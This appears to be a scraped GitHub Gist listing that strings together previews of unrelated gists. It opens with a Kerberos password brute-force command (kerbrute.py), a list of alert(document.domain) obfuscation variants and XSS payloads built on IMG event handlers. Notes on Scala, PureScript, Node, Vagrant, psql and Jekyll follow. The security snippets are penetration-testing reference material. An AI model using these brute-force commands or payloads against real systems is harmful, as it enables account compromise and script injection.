With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Riccardo Sirigu ricsirigu
👨💻
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
jhaddix
/ Testing_Checklist.md
Last active
April 26, 2024 21:38
— forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
jdegoes
/ Applied-FP-with-Scala.md
Last active
May 5, 2024 12:20
Copyright © 2016-2018 Fantasyland Institute of Learning. All rights reserved.
A function is a mapping from one set, called a domain, to another set, called the codomain. A function associates every element in the domain with exactly one element in the codomain. In Scala, both domain and codomain are types.
val square : Int => Int = x => x * x
megamaddu
/ purescript.md
Last active
January 4, 2020 06:40
- Compiles to JavaScript
- Haskell-inspired type system (with some improvements!)
- No runtime (unlike Elm, GHCJS, etc)
- A focus on readable and debuggable JavaScript
Node is a program (usually run from the command line) which executes JavaScript, and comes with a built-in library for writing network and filesystem code. Node is built on V8, the same JavaScript VM used in the Chrome browser. Instead of being wrapped with a GUI and web browser features like the DOM, node wraps V8 to expose lower-level operating system APIs. Some modules that come with node include: http, fs (filesystem), crypto (cryptography), and lots more.
Modules are chunks of code you can 'require' and then use. Today we'll use the http module, like so:
var http = require('http')
Typing vagrant from the command line will display a list of all available commands.
Be sure that you are in the same directory as the Vagrantfile when running these commands!
vagrant init-- Initialize Vagrant with a Vagrantfile and ./.vagrant directory, using no specified base image. Before you can do vagrant up, you'll need to specify a base image in the Vagrantfile.vagrant init <boxpath>-- Initialize Vagrant with a specific box. To find a box, go to the public Vagrant box catalog. When you find one you like, just replace it's name with boxpath. For example,vagrant init ubuntu/trusty64.
vagrant up-- starts vagrant environment (also provisions only on the FIRST vagrant up)
Magic words:
psql -U postgresSome interesting flags (to see all, use -h or --help depending on your psql version):
-E: will describe the underlaying queries of the\commands (cool for learning!)-l: psql will list all databases and then exit (useful if the user you connect with doesn't has a default database, like at AWS RDS)
A list of the most common functionalities in Jekyll (Liquid). You can use Jekyll with GitHub Pages, just make sure you are using the proper version.
Running a local server for testing purposes:
NewerOlder